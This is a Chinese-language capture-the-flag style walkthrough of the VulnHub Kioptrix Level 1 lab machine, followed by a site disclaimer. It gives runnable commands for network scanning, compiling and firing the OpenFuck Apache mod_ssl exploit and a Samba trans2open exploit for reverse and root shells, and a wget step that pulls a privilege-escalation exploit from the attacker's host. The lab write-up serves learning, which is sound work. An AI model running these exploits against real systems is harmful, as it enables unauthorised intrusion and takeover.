1.   准备环境

      从https://www.vulnhub.com/entry/kioptrix-level-1-1,22/下载靶机kioptrix-1。

      靶机环境配置独立网段（192.168.5.0/24），单网卡DHCP自动获得IP，kali双网卡，一个接入靶机网络，一个接入管理网络。

2.    探测靶机IP

nmap –sn 192.168.5.0/24

3.     扫描靶机服务端口

nmap –A 192.168.5.108

nmap --script=vuln 192.168.5.108

      高危组件和服务：

•       apache 1.3.20
•       smbd版本未知

4.     尝试渗透

4.1    apache 1.3.20漏洞

searchsploit apache 1.3.20

gcc -o OpenFuck /usr/share/exploitdb/exploits/unix/remote/47080.c –lcrypto

查看帮助，根据操作系统不同，参数选择有所不同。

./OpenFuck -h | grep 1.3.20

根据nmap服务探测结果，靶机操作系统为redhat，故选择尝试0x6a/0x6b

./OpenFuck 0x6b 192.168.5.108 443 -c 50

成功建立反弹shell，为apache用户，漏洞利用程序会自动下载本地提权的工具，但是因为内网不通，下载失败，提权失败，需要手动下载该提权工具，上传至靶机/tmp目录下：

// kali
python3 -m http.server --bind 0.0.0.0 9000
// 靶机
cd /tmp
wget http://192.168.5.2:9000/ptrace-kmod.c
gcc -o exploit ptrace-kmod.c -B /usr/bin

再次执行(50不一定每次都成功，放大到60)

./OpenFuck 0x6b 192.168.5.108 443 -c 60

本地提权成功，已经拿到root用户。

4.2    apache 1.3.20漏洞

nmap未探测到samba服务的版本号，使用MSF尝试探测，探测到版本号为2.2.1a。

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.5.108
msf6 auxiliary(scanner/smb/smb_version) > run

漏洞库匹配：

searchsploit samba 2.2

gcc /usr/share/exploitdb/exploits/multiple/remote/10.c -o smb
./smb -h

./smb -b 0 -c 192.168.5.2 192.168.5.108

通过samba漏洞渗透成功。

5.     总结

TBC

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）